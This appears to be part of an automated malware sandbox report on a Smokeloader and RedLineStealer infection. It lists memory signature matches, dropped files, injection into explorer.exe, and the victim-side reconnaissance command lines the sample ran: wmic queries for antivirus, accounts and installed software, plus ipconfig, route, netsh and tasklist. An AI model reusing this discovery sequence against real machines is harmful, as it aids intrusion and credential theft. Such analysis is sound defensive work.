Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: OCYe9qcxiM.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4470.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hehcrfb.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fihcrfb.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@63/15@5/4

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

Code function: 0_2_0079273A CreateToolhelp32Snapshot,Module32First,

0_2_0079273A

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B67138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,

9_2_00007FF780B67138

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\hehcrfb

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\4470.tmp

Jump to behavior

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior

Source: OCYe9qcxiM.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="556"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="556"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="624"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="624"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="744"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="744"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="868"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="868"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="920"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="920"::GetOwner

Source: C:\Windows\explorer.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543198734.000001B605D13000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543460011.000001B605D1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM Win32_Productp#=:;
Source: ECAA.tmp.11.dr, EF9B.tmp.11.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: OCYe9qcxiM.exe

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\OCYe9qcxiM.exe "C:\Users\user\Desktop\OCYe9qcxiM.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\hehcrfb C:\Users\user\AppData\Roaming\hehcrfb
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4470.exe C:\Users\user\AppData\Local\Temp\4470.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fihcrfb C:\Users\user\AppData\Roaming\fihcrfb
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\354F.exe C:\Users\user\AppData\Local\Temp\354F.exe
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: unknown	Process created: C:\Users\user\AppData\Roaming\hehcrfb C:\Users\user\AppData\Roaming\hehcrfb
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fihcrfb C:\Users\user\AppData\Roaming\fihcrfb
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4470.exe C:\Users\user\AppData\Local\Temp\4470.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\354F.exe C:\Users\user\AppData\Local\Temp\354F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
